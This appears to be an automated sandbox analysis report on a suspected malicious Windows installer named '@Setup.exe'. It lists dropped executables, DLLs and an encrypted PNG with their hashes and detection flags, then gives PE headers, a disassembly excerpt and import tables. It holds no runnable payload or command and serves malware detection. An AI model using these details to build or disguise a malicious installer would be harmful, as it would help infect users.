                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):60
                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
                                                                                                                                                  File Type:PNG image data, 3792 x 2093, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):6447207
                                                                                                                                                  Entropy (8bit):7.998441497232368
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:196608:sXKjzP/kSY5cPYsvASGkG9166F/KHaj2M:sXKjrMSY5yPoxv/XL
                                                                                                                                                  MD5:B0CB3F07919BEB69B342ED871C6511A9
                                                                                                                                                  SHA1:C23C0B4F9810D50ECB9EA186F57325C7B41DEEBE
                                                                                                                                                  SHA-256:AB4A4A40AA1C1129150AE38AA4F939EB22B4125F6BE8F12251D7C76239B3F8F3
                                                                                                                                                  SHA-512:75BD57701CAC2BE23A9A63AE414F0E019D7C69523F93B3CE6D908B76CC382D84AB1F1C2B085633D39A8E7294C1879601A1A3B03C5871BA0E35A345F559E06AA4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.PNG........IHDR.......-.....1S.... .IDATx..;..G....+.U={.. .....H.$..gm........1c...&.r....wm..=...-F...W....ft...Y.........~.3+.....|....?@@...o......\.._@...c....0.e..o..us).-.9~.4..:.H]..R.#M.K.!...#.s...4..G.c.#Zk.#B.s...p......R...PU....HUU..RJ.......^...Ru]..n...&w.R.WeE.DH.kB...)....!.....cRI.....d.u.....W..j..xw... .e,.....lC`....o=.^ `..d....;.nH..|k..3..}......'Ts.....D....C..h.{......$.}w.np..h.n1..U9\F..<[...J..\..............c..f.6.g.o......$.1..^z)..8..c$./.|3...s.9..&.|...r....L.q..I~{)..>.uw..oY.d../..ksw..P..p.]....T.K1.R..i.........I.9B.....D@@@..a/.?.[ 8.K|......H..X..T...4.{..c..4..!.^...}X~7.'......uc.$H................|.{5...Q...,..{..p..]v{....m.]).....[-.{..... !l......V..W k....u....g...$....[%>^.oI.|.......$.......$.g.@...m.hI~S;.).=...K%..H.T..d"....W.O.J.A..../%..@..J..-...ZW........oz....b.....B..x.1......>q.....[..I>..l...t..I..I..n....s....P..p...C..3..|.(..<..3r.F7d.#..;..".p..dg.p.#4Mm........}.....A.......
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp
                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):35616
                                                                                                                                                  Entropy (8bit):6.953519176025623
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                                                                                  MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                                                                                  SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                                                                                  SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                                                                                  SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp
                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):6144
                                                                                                                                                  Entropy (8bit):4.720366600008286
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                  MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                  SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                  SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                  SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3367424
                                                                                                                                                  Entropy (8bit):6.530011244733973
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                                                                                  MD5:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                  SHA1:DC1C645533E0FD1637BF455BA69A9481E7C4B83A
                                                                                                                                                  SHA-256:8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
                                                                                                                                                  SHA-512:C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp
                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):35616
                                                                                                                                                  Entropy (8bit):6.953519176025623
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                                                                                  MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                                                                                  SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                                                                                  SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                                                                                  SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp
                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):6144
                                                                                                                                                  Entropy (8bit):4.720366600008286
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                  MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                  SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                  SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                  SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3367424
                                                                                                                                                  Entropy (8bit):6.530011244733973
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                                                                                  MD5:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                  SHA1:DC1C645533E0FD1637BF455BA69A9481E7C4B83A
                                                                                                                                                  SHA-256:8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
                                                                                                                                                  SHA-512:C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):846325235
                                                                                                                                                  Entropy (8bit):0.13954043794048707
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:
                                                                                                                                                  MD5:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                  SHA1:FEB8A10FEE0388E1D93C669444F3A237C38EA5E4
                                                                                                                                                  SHA-256:0CE2CDB61164F5C03D11DEF609873901F58510F764E8491B4EC1A5D3E0759E0B
                                                                                                                                                  SHA-512:899CC13F5CD136D9F3D06BD13BD608CAB1DCEC1CE2F550A371C76253CFB155149A2CAE9827A365CCCFFA921A607A684DC7CD1A15645D317D7D9C199CEA1735F8
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"w.RC..RC..RC..I..`C..I...C..[;..UC..[;..IC..RC...B..I..NC..I..{C..I..SC..I..SC..RichRC..........................PE..L....NKO......................h...................@..........................@r.......r.......@.........................................:.e..........................................................................................................text...!........................... ..`.rdata...1.......2..................@..@.data...x........,..................@....rsrc...:.e.......e.................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):846325235
                                                                                                                                                  Entropy (8bit):0.13954043794048707
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:
                                                                                                                                                  MD5:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                  SHA1:FEB8A10FEE0388E1D93C669444F3A237C38EA5E4
                                                                                                                                                  SHA-256:0CE2CDB61164F5C03D11DEF609873901F58510F764E8491B4EC1A5D3E0759E0B
                                                                                                                                                  SHA-512:899CC13F5CD136D9F3D06BD13BD608CAB1DCEC1CE2F550A371C76253CFB155149A2CAE9827A365CCCFFA921A607A684DC7CD1A15645D317D7D9C199CEA1735F8
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"w.RC..RC..RC..I..`C..I...C..[;..UC..[;..IC..RC...B..I..NC..I..{C..I..SC..I..SC..RichRC..........................PE..L....NKO......................h...................@..........................@r.......r.......@.........................................:.e..........................................................................................................text...!........................... ..`.rdata...1.......2..................@..@.data...x........,..................@....rsrc...:.e.......e.................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Entropy (8bit):4.408405834485638
                                                                                                                                                  TrID:
                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                  File name:@Setup.exe
                                                                                                                                                  File size:73'409'778 bytes
                                                                                                                                                  MD5:c6f709a40a7d35051ee49ad1e367df65
                                                                                                                                                  SHA1:da1b6b9d9471644dc2ff198a4f392c374d4508bb
                                                                                                                                                  SHA256:cfef95129d9fd21cf9fdec5d1332cde09a7eb16144edf7867c0b398d5f67b036
                                                                                                                                                  SHA512:e514fc4f73b7f4b8ec70f3ef7e671a5f2823a1a3fd935aaddb13a67c216775f3a4eba2d1677cc6382a49af9ae806bdafaa2e3bcb863d1f2a0f4533df2a99dcdf
                                                                                                                                                  SSDEEP:24576:7r05zRihIi9rQbAVBsEnaUb9FsryJgMW89sUbx2mwY6:v0cOi9kbAVBsIaUb9FQkW8umAmo
                                                                                                                                                  TLSH:21F712927724E5FC4A61452A4347E9B373DF238002240D9CFEA6D09DED6627A4BCA0FD
                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....
                                                                                                                                                  Icon Hash:c8ceccb2a2d1f132
                                                                                                                                                  Entrypoint:0x4038af
                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                  Digitally signed:true
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                  Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                  TLS Callbacks:
                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                  OS Version Major:5
                                                                                                                                                  OS Version Minor:0
                                                                                                                                                  File Version Major:5
                                                                                                                                                  File Version Minor:0
                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                  Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                                                                                  Signature Valid:false
                                                                                                                                                  Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                                                                                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                  Error Number:-2146869232
                                                                                                                                                  Not Before, Not After
                                                                                                                                                  • 24/06/2022 09:22:08 14/04/2025 16:06:58
                                                                                                                                                  Subject Chain
                                                                                                                                                  • OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.1.3.6.1.4.1.311.60.2.1.2=Washington, OID.2.5.4.15=Private Organization, CN=TechPowerUp LLC, SERIALNUMBER=604 057 982, O=TechPowerUp LLC, L=Spokane, S=Washington, C=US
                                                                                                                                                  Version:3
                                                                                                                                                  Thumbprint MD5:648FDCF28A095B6DA4C31C9D5CD35A64
                                                                                                                                                  Thumbprint SHA-1:8DAAE716F69B30A0DDC8C8A3F8EAC6C5B328CFD2
                                                                                                                                                  Thumbprint SHA-256:20740B0C498F45830DD1D84EC746DEA5E43C2B0D32C603F2C2403A333CE9E8E7
                                                                                                                                                  Serial:115BBE9E1C286827AF66E7A01390C206
                                                                                                                                                  Instruction
                                                                                                                                                  sub esp, 000002D4h
                                                                                                                                                  push ebx
                                                                                                                                                  push ebp
                                                                                                                                                  push esi
                                                                                                                                                  push edi
                                                                                                                                                  push 00000020h
                                                                                                                                                  xor ebp, ebp
                                                                                                                                                  pop esi
                                                                                                                                                  mov dword ptr [esp+18h], ebp
                                                                                                                                                  mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                  mov dword ptr [esp+14h], ebp
                                                                                                                                                  call dword ptr [00409030h]
                                                                                                                                                  push 00008001h
                                                                                                                                                  call dword ptr [004090B4h]
                                                                                                                                                  push ebp
                                                                                                                                                  call dword ptr [004092C0h]
                                                                                                                                                  push 00000008h
                                                                                                                                                  mov dword ptr [0047EB98h], eax
                                                                                                                                                  call 00007F959451A80Bh
                                                                                                                                                  push ebp
                                                                                                                                                  push 000002B4h
                                                                                                                                                  mov dword ptr [0047EAB0h], eax
                                                                                                                                                  lea eax, dword ptr [esp+38h]
                                                                                                                                                  push eax
                                                                                                                                                  push ebp
                                                                                                                                                  push 0040A264h
                                                                                                                                                  call dword ptr [00409184h]
                                                                                                                                                  push 0040A24Ch
                                                                                                                                                  push 00476AA0h
                                                                                                                                                  call 00007F959451A4EDh
                                                                                                                                                  call dword ptr [004090B0h]
                                                                                                                                                  push eax
                                                                                                                                                  mov edi, 004CF0A0h
                                                                                                                                                  push edi
                                                                                                                                                  call 00007F959451A4DBh
                                                                                                                                                  push ebp
                                                                                                                                                  call dword ptr [00409134h]
                                                                                                                                                  cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                  mov dword ptr [0047EAB8h], eax
                                                                                                                                                  mov eax, edi
                                                                                                                                                  jne 00007F9594517DDAh
                                                                                                                                                  push 00000022h
                                                                                                                                                  pop esi
                                                                                                                                                  mov eax, 004CF0A2h
                                                                                                                                                  push esi
                                                                                                                                                  push eax
                                                                                                                                                  call 00007F959451A1B1h
                                                                                                                                                  push eax
                                                                                                                                                  call dword ptr [00409260h]
                                                                                                                                                  mov esi, eax
                                                                                                                                                  mov dword ptr [esp+1Ch], esi
                                                                                                                                                  jmp 00007F9594517E63h
                                                                                                                                                  push 00000020h
                                                                                                                                                  pop ebx
                                                                                                                                                  cmp ax, bx
                                                                                                                                                  jne 00007F9594517DDAh
                                                                                                                                                  add esi, 02h
                                                                                                                                                  cmp word ptr [esi], bx
                                                                                                                                                  Programming Language:
                                                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                                                                  • [ C ] VS2010 SP1 build 40219
                                                                                                                                                  • [RES] VS2010 SP1 build 40219
                                                                                                                                                  • [LNK] VS2010 SP1 build 40219
                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x4eea.rsrc
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x46000220x24d0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                  .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                  .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                  .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                  .rsrc0x1000000x4eea0x5000260ce69bf08624829200aa992cf66ec0False0.614990234375data5.891328935276688IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .reloc0x1050000xfd60x10002f3325583e846b5bd3e76a8b19f08c09False0.568603515625data5.332844893533801IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                  RT_ICON0x1002380x192ePNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0017064846416381
                                                                                                                                                  RT_ICON0x101b680x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.3971724979658259
                                                                                                                                                  RT_ICON0x1041d00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6365248226950354
                                                                                                                                                  RT_DIALOG0x1046380x100dataEnglishUnited States0.5234375
                                                                                                                                                  RT_DIALOG0x1047380x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                  RT_DIALOG0x1048540x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                  RT_GROUP_ICON0x1048b40x30dataEnglishUnited States0.8541666666666666
                                                                                                                                                  RT_VERSION0x1048e40x330dataEnglishUnited States0.43995098039215685
                                                                                                                                                  RT_MANIFEST0x104c140x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                                                                                                                                  DLLImport
                                                                                                                                                  KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                                                                  USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                                                  GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                                                  SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                                                  ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                                                                  COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                  ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                                  VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                  EnglishUnited States
                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
